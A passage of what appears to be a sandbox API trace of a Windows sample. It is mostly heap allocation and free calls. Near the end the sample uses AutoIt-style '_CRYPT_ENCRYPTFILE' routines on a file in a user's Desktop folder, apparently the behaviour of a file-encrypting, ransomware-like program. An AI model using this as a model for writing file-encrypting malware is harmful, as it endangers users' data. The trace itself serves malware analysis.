hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.557] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.559] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.559] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.559] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.561] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0134.561] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0134.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0134.562] CloseHandle (hObject=0x2a0) returned 1 [0134.563] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.563] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0134.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c95190, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x8d217aa0, ftLastAccessTime.dwHighDateTime=0x1d5e245, ftLastWriteTime.dwLowDateTime=0x8d217aa0, ftLastWriteTime.dwHighDateTime=0x1d5e245, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="MjT96UMRMqqhF.swf", cAlternateFileName="MJT96U~1.SWF")) returned 0x41ac200 [0134.563] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0134.563] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.563] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.563] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0134.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0134.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0134.564] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.565] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0134.565] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0134.565] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, 